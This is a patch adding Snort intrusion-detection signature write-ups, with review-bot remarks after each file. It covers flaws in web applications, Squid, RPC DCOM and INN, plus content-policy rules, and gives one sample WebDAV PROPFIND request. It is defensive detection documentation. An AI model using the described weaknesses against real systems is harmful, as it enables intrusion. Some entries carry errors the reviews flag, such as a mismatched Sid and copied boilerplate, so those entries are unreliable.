+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
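Review bot: "An attacker can supplied an overly long command" in Attack Scenarios should be "can supply", and "associated with the several commands of an IMAP service" in Summary should read "with several commands". "Brian Caswell<bmc@sourcefire.com>" is missing the space before the address. Additional References is empty; add the vendor advisory or CVE for the Mercury Mail IMAP issue.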
--- /dev/null
+++ b/doc/signatures/2355.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2355
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application Invision Board.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+Invision Board contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating a variable when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file emailer.php.
+
+--
+Affected Systems:
+	Invision Power Services Invision Board 1.1.1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the variable that defines the location of the emailer.php
+script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
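Review bot: "the user running the webserver, usually root" in Detailed Information is misleading, since web servers normally run as a dedicated unprivileged account; drop or qualify the root claim. The same sentence ends "by supplying their code in the file emailer.php" and reads as if code is written into emailer.php, while Attack Scenarios says the attacker supplies a path for the variable that locates emailer.php; reorder the sentence to say that, and name the variable. Also "GET or POST  request  to" has doubled spaces and "Rule:  " carries trailing whitespace.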
--- /dev/null
+++ b/doc/signatures/3089.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+3089
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a denial of
+service associated with Squid Web Cache Communication Protocol (WCCP).
+
+--
+Impact:
+A successful attack can cause the Squid web cache server process to
+terminate.
+
+--
+Detailed Information:
+A vulnerability exists in the way that a Squid server handles a WCCP
+message.  A WCCP I_SEE_YOU message that contains an invalid number of
+web cache entries can create an out-of-bounds array reference.  This may
+result in a read access violation of memory, causing a denial of service.
+
+--
+Affected Systems:
+	Squid Web Proxy Cache 2.5 STABLE7 and prior versions
+
+--
+Attack Scenarios:
+An attacker can craft a WCCP I_SEE_YOU message with an invalid number of
+web cache entries, causing the web cache server process to terminate.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+--
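Review bot: the final heading "Additional References" lacks the trailing colon used by every other file and the section is empty; add the colon and a reference for the Squid WCCP I_SEE_YOU issue, which the Detailed Information describes precisely enough that an advisory link would be easy to supply.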
--- /dev/null
+++ b/doc/signatures/2328.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2328
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+authentication_index.php script which contains known vulnerabilities and
+is part of  the phpGedView CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the phpGedView CGI web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to the
+execution of arbitrary code of the atttackers choosing.
+
+--
+Affected Systems:
+	phpGedView
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including a file in
+paramters supplied to the script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
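Review bot: Affected Systems lists only "phpGedView" without a version, while Corrective Action asks for an up-to-date version; state the affected version range. Fix "atttackers choosing" (attacker's), "paramters" (parameters) and the doubled space in "part of  the". Additional References is empty.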
--- /dev/null
+++ b/doc/signatures/1706.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1706
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
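Review bot: Summary and Detailed Information are the same generic CGI text as 1206.txt and 1459.txt with only the sid changed, so the reader cannot tell what sid 1706 matches; identify the script or application in Summary and Affected Systems. Also fix "running ona web server" and "attackers choosing", and rewrap the over-long "relationships between the victim server and other hosts ..." line.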
--- /dev/null
+++ b/doc/signatures/582.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+582
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rexd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rexd is using.  Attackers can also learn what versions of the rexd protocol are accepted by rexd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rexd run.  The rexd RPC service allows remote program execution.  If weak authentication is used, an attacker may run arbitrary commands as a user other than root.
+
+--
+Affected Systems:
+AIX 4.0
+Compaq Tru64 UNIX (Any version)
+HP-UX 10.20
+HP-UX 11
+Red Hat Linux 6.0
+Red Hat Linux 7.x
+Solaris 2.5.1
+Solaris 2.6
+Solaris 7
+Solaris 8
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rexd runs.  This may be a precursor to accessing rexd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rexd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rexd, not probes of the rexd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rexd service itself. An attacker may attempt to go directly to the rexd port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/37
+
+CERT
+http://www.cert.org/advisories/CA-1992-05.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS23
+
+
+--
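Review bot: the comma in "without querying the portmapper service which, would not trigger the rule" is misplaced; write "service, which would not trigger the rule". Otherwise this entry is the model the others should follow: it names the request the rule matches (portmap GETPORT for rexd), lists affected systems with versions, describes real false positives and false negatives, and carries references.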
--- /dev/null
+++ b/doc/signatures/1079.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+Sid:
+1079
+
+--
+
+Summary:
+This event is generated when an attempt is made to use the
+PROPFIND WebDAV request method on a web server.
+
+--
+Impact:
+Information gathering. An attacker can get a directory listing for all 
+directories configured to support WebDAV in an Apache web server. This
+could by a prelude to a more serious attack.
+
+--
+Detailed Information:
+WebDAV is a web publishing protocol implemented by several web servers,
+including Apache.  Certain configurations of Apache, such as those in
+SuSE 6.0-7.0 and RedHat 6.2-7.0, have WebDAV enabled and misconfigured
+in such a way to allow directory listings of the entire server file
+structure -- specificially, WebDAV was enabled on the Document Root of
+the web server.  Since subdirectories of a WebDAV-enabled directory
+are automatically enabled as well, this caused the entire web server
+to have WebDAV enabled.
+
+Since a directory, or its parent directory, must have been 
+specifically declared for WebDAV to be enabled, configuration errors
+should be straightforward to find and correct.
+
+--
+Affected Systems:
+	Apache Web Server with WebDAV enabled and misconfigured.
+ 
+--
+Attack Scenarios:
+Attacker gets a listing by sending something like:
+PROPFIND / HTTP/1.1
+
+--
+Ease of Attack:
+Simple. Requires that the attacker hand-craft an HTTP request.
+
+--
+False Positives:
+Legitimate web publishers may use PROPFIND commands, this should not be
+allowed from resources external to the protected network.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to determine whether this was likely an attack or not.
+Try to determine whether this was from a legitimate web publisher or not.
+Try to determine whether the target web server was Apache with WebDAV
+enabled and misconfigured.
+
+Disallow this method of publishing from resources external to the
+protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
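Review bot: three typos in this file's prose and an empty reference list. Impact has "This could by a prelude" (should be "could be"), Detailed Information has "specificially" (should be "specifically"), and Contributors has "Original document author unkown" (should be "unknown"). Corrective Action could also turn the hint in Detailed Information into an instruction: since a directory must be explicitly declared for WebDAV, tell the reader to check the Apache configuration for a DAV declaration on the document root and to restrict PROPFIND to authenticated publishers rather than only "Disallow this method of publishing from resources external to the protected network". Additional References is empty; the SuSE and RedHat versions named in Detailed Information suggest there is an advisory worth citing.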
--- /dev/null
+++ b/doc/signatures/100000537.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000537
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "thinkWMS" application running on a webserver. Access to 
+the file "index.php" with SQL commands being passed as the "id" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "index.php" script used by the 
+"thinkWMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using thinkWMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
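Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") describes credential checking, not SQL injection, and contradicts the first paragraph, which correctly describes injection through the "id" parameter; drop it or replace it with a sentence about the parameter reaching the database query unsanitized. Also fix "ona" to "on a", the redundant "an exploitation attempt has been attempted" in Summary (say "may indicate an exploitation attempt"), and the missing blank line between the Sid number and the "--" separator (every other file in this patch has one). Corrective Action only says to patch; since Attack Scenarios already names the root cause (input not sanitized before reaching the database), it should also recommend validating the "id" parameter and using parameterized queries.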
--- /dev/null
+++ b/doc/signatures/509.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+509
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
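Review bot: the Affected Systems section is empty in this file; the other generic web-authentication docs in this patch fill it in ("All systems using a web server." or similar), so add a line rather than shipping a blank section. Detailed Information has the typo "ona web server" (should be "on a web server"). The Summary promises "an authentication vulnerability in a web server or an application running on that server" but nothing in the file identifies what the rule matches, and Additional References is empty; a reader of this doc cannot tell this SID apart from 1508 or 826 below.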
--- /dev/null
+++ b/doc/signatures/2468.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2468
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
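Review bot: Affected Systems lists "All systems using file and print sharing for Windows" while the Summary and Detailed Information speak only of "Samba". Windows hosts run their own SMB file sharing service, not Samba, so either the text should describe the SMB/CIFS protocol traffic the rule matches (which would cover both) or the Windows line should go. Attack Scenarios has the typo "adminsitrative" (should be "administrative"). Additional References is empty.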
--- /dev/null
+++ b/doc/signatures/1311.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1311
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "hardcore anal".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "hardcore anal".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
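Review bot: the Summary reads "a webpage was visited the included the content" and should read "that included the content". Layout differs from the rest of the patch: there is a stray blank line between "Sid:" and the number, no blank line before the first "--", and six empty lines after "Additional References:" before the closing separator; trim them so the file matches the others.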
--- /dev/null
+++ b/doc/signatures/460.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+460
+
+--
+
+Summary:
+This event is generated when an ICMP Type 2 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 2 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 2 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 2 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
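Review bot: this file has no Affected Systems section between Detailed Information and Attack Scenarios; every other entry in this patch carries one, so add it (for example "Any host.") to keep the format consistent for anything that parses these files. Impact ("ICMP Type 2 datagrams are not currently used by any known devices.") restates the fact already given in Detailed Information instead of describing an impact; state what the traffic may indicate for the target (reconnaissance or a covert channel) and keep the "not defined for use" statement in Detailed Information only. Attack Scenarios says "None known" while Ease of Attack says "Numerous tools and scripts can generate this type of ICMP datagram"; reconcile the two.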
--- /dev/null
+++ b/doc/signatures/2426.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2426
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
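Review bot: Affected Systems has a stray space in the version, "ISC INN 2.4 .0" (should be "2.4.0"). Detailed Information has "code of the attackers choosing" (should be "attacker's choosing"), and Corrective Action's second line "Apply the appropriate vendor supplied patches" lacks a period. Additional References is empty although the Summary describes "a known vulnerability"; add the vendor advisory or CVE for this INN 2.4.0 overflow so the reader can verify the version claim.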
--- /dev/null
+++ b/doc/signatures/2479.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2479
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the winreg
+service.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to bind to the RPC
+service for winreg.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
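Review bot: Impact is given as "Unknown." but Attack Scenarios says "An attacker may attempt to bind to the service to manipulate host settings." and Corrective Action prescribes blocking the RPC ports; the sections disagree. winreg is the remote registry interface, so Impact should say information gathering and possible modification of system configuration via the remote registry. The Microsoft KB URL in Additional References is an old-style support link (support.microsoft.com/support/kb/articles/q153/1/83.asp); check that it still resolves before shipping.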
--- /dev/null
+++ b/doc/signatures/1347.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted g++ command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The g++
+command is the GNUproject's C and C++ compiler used to compile C and
+C++ source filesinto executable binary files. The attacker could
+possibly compile aprogram needed for other attacks on the system or
+install a binaryprogram of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains
+'/usr/bin/g++'in theURI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin. This command may also
+be requested ona command line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note: thesecurelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
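Review bot: the Sid does not match the file. This is doc/signatures/1347.txt but the Sid section reads "1341", and Additional References lists "sid: 1347" (this file) while omitting 1341, which is what the sibling list in 1341's own doc would look like; the content appears copied from 1341.txt, so set the Sid to 1347 and fix the sibling list. Words are run together throughout where a line break was lost: "compiile", "GNUproject's", "source filesinto", "compile aprogram", "binaryprogram", "'/usr/bin/g++'in theURI", "it'sdesignated", "requested ona command line", "Wheneverpossible", "shouldhave", "addedto", "runtimesecurelevel", "thesecurelevel". There is also no Affected Systems section; the other web-command docs in this patch have one.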
--- /dev/null
+++ b/doc/signatures/3228.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3228
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
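Review bot: this file is word-for-word identical to doc/signatures/3385.txt later in this patch, including the typo "Expoit code exists." (should be "Exploit"). If SIDs 3228 and 3385 match different traffic (different RPC transports or offsets), Detailed Information should say how they differ; otherwise the reader has no way to tell which event fired on what. Additional References is empty for a well-known vulnerability; add the Microsoft security bulletin and CVE identifier for the RPC DCOM overflow described here.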
--- /dev/null
+++ b/doc/signatures/2417.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+2417
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
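Review bot: the Summary and Detailed Information never say what the rule matches; "spurious ftp traffic" and "spurious activity in FTP traffic between hosts" describe nothing an analyst can verify against a packet, and Ease of Attack "Simple." cannot be judged for an undefined event. Name the FTP command or pattern the rule looks for. Corrective Action's "Use secure shell (ssh) to transfer files as a replacement for FTP." should name sftp or scp, which are the ssh-based file transfer tools. There is no Affected Systems section, and Brian Caswell's address is written "brian.caswell@sourcefire.com" here but "bmc@sourcefire.com" everywhere else in the patch.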
--- /dev/null
+++ b/doc/signatures/1508.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1508
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
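Review bot: Detailed Information has "running ona web server" (should be "on a web server") and "of the attackers choosing" (should be "attacker's"). The Summary speaks of "a known vulnerability in a CGI web application" but nothing identifies the application or vulnerability, and the whole body is the same boilerplate that appears verbatim in doc/signatures/826.txt in this patch; add the specific script or parameter SID 1508 matches and a reference in the empty Additional References section.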
--- /dev/null
+++ b/doc/signatures/1782.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1782
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "nipple clamp".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "nipple clamp".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
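Review bot: the Summary reads "a webpage was visited the included the content" and should read "that included the content". False Positives ends with a stray "etc.etc." that should be dropped. As in 1311.txt, there is a blank line between "Sid:" and the number and six empty lines after "Additional References:"; trim both to match the rest of the patch.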
